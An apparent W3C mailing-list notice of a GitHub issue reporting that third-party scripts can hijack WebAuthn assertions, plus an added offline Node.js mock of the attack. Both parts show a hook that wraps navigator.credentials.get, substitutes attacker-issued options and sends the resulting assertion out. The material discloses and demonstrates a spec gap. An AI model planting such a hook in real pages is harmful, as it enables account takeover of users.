- From: SMD2 via GitHub <sysbot+gh@w3.org>
- Date: Wed, 11 May 2022 18:50:31 +0000
- To: public-webauthn@w3.org
SMD2 has just created a new issue for https://github.com/w3c/webauthn:
== Missing specification on rpId validation when invoking the API from 3rd party origin ==
Third-party JavaScript running on a page is able to call the WebAuthn API using the rpId of the first-party origin context.
This allows attackers with control over any JS embedded in a page, or via a browser extension, to steal a user's assertion and perform an account takeover attack.
This was proven to be exploitable on all browsers/platforms/authenticators that support WebAuthn.
We conducted the attack by wrapping the `navigator.credentials.get` function and extending its functionality to replace the original PublicKeyCredentialRequestOptions with a malicious one received from a remote server.
The implementation looks like this:
```javascript
// Keep a reference to the native function (bound, or the browser throws "Illegal invocation").
const originalNavCredGet = navigator.credentials.get.bind(navigator.credentials);
navigator.credentials.get = async (options) => {
  // Discard the page's options; use the request options issued by the attacker's server.
  const remoteChallenge = await getRemoteChallenge();
  // The browser validates rpId against the top-level origin, so this call succeeds.
  const assertion = await originalNavCredGet(remoteChallenge);
  // Exfiltrate the resulting assertion to the attacker's server.
  sendAssertion(assertion);
  return assertion;
};
```
This code is executed from a cross-origin JS resource or content script.
A full working POC code will be released in the future.
Please view or discuss this issue at https://github.com/w3c/webauthn/issues/1731 using your GitHub account
--
Sent via github-notify-ml as configured in https://github.com/w3c/github-notify-ml-config
Received on Wednesday, 11 May 2022 18:50:32 UTC
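The following is an added, self-contained Node.js simulation of the hook described in the issue; it is not code from the issue author, the promised POC, or the WebAuthn project. The `navigator` object, its `credentials.get`, the "authenticator" output, the rpId check and the challenge values are all mocks constructed here, and the names `makeMockNavigator`, `installHook`, `rpIdAllowedFor` and `runScenario` are chosen for this example. The mock reproduces the property the issue relies on: the browser checks `rpId` only against the top-level document origin, not the origin of the script making the call, so the assertion the authenticator produces is bound to the attacker-supplied challenge while still carrying the first-party `origin` in clientDataJSON.

```javascript
// Added example: offline simulation of a third-party script hooking
// navigator.credentials.get. Nothing here talks to a real authenticator.

const TOP_LEVEL_ORIGIN = "https://example.com";   // first-party page (constructed)
const SCRIPT_ORIGIN = "https://cdn.attacker.test"; // origin of the hooking script (constructed)

// Deterministic 32-byte "challenge" (constructed; real challenges are random).
function constructedChallenge(seed) {
  const out = new Uint8Array(32);
  let x = seed >>> 0;
  for (let i = 0; i < out.length; i++) {
    x = (Math.imul(x, 1103515245) + 12345) >>> 0;
    out[i] = x & 0xff;
  }
  return out;
}

const b64url = (bytes) => Buffer.from(bytes).toString("base64url");

// Approximation of the spec's rule: rpId must equal, or be a registrable-domain
// suffix of, the top-level origin's host. The public suffix list is ignored here.
// Note what is NOT consulted: the origin of the calling script.
function rpIdAllowedFor(rpId, topLevelOrigin) {
  const host = new URL(topLevelOrigin).hostname;
  return host === rpId || host.endsWith("." + rpId);
}

// Mock of the browser API plus authenticator: returns an assertion whose
// clientDataJSON binds the challenge it was handed and the top-level origin.
function makeMockNavigator(topLevelOrigin) {
  return {
    credentials: {
      async get(options) {
        const pk = options.publicKey;
        if (!rpIdAllowedFor(pk.rpId, topLevelOrigin)) {
          throw new Error("SecurityError: rpId not valid for " + topLevelOrigin);
        }
        const clientDataJSON = JSON.stringify({
          type: "webauthn.get",
          challenge: b64url(pk.challenge),
          origin: topLevelOrigin,
        });
        return { id: "cred-1", rawId: "cred-1", response: { clientDataJSON, signature: "mock-signature" } };
      },
    },
  };
}

// The hook from the issue, parameterised so it can run against the mock.
function installHook(nav, getRemoteChallenge, sendAssertion) {
  const originalGet = nav.credentials.get.bind(nav.credentials);
  nav.credentials.get = async (_pageOptions) => {
    const remoteOptions = await getRemoteChallenge(); // attacker-issued options
    const assertion = await originalGet(remoteOptions);
    await sendAssertion(assertion);                   // exfiltration
    return assertion;                                 // page carries on unaware
  };
}

async function runScenario() {
  const nav = makeMockNavigator(TOP_LEVEL_ORIGIN);
  const exfiltrated = [];
  const attackerChallenge = constructedChallenge(0xa77ac4e2);
  const pageChallenge = constructedChallenge(0x1234abcd);

  // Script from SCRIPT_ORIGIN installs the hook; the rpId it uses is the
  // first party's, which is exactly what the browser-side check permits.
  installHook(
    nav,
    async () => ({ publicKey: { rpId: "example.com", challenge: attackerChallenge } }),
    async (a) => { exfiltrated.push(a); },
  );

  // The legitimate page now asks for an assertion over its own challenge.
  const result = await nav.credentials.get({ publicKey: { rpId: "example.com", challenge: pageChallenge } });
  const cd = JSON.parse(exfiltrated[0].response.clientDataJSON);

  return {
    stolen: exfiltrated.length,
    signedChallengeIsAttackers: cd.challenge === b64url(attackerChallenge),
    signedChallengeIsPages: cd.challenge === b64url(pageChallenge),
    origin: cd.origin,
    scriptOriginConsulted: cd.origin === SCRIPT_ORIGIN,
    pageGotAssertion: result === exfiltrated[0],
  };
}

runScenario().then((r) => console.log(r));
```

Run with `node`: the exfiltrated assertion's clientDataJSON carries the attacker's challenge and the first-party origin, and the page receives that same object, so neither the page nor a relying party inspecting `origin` can tell which script issued the options.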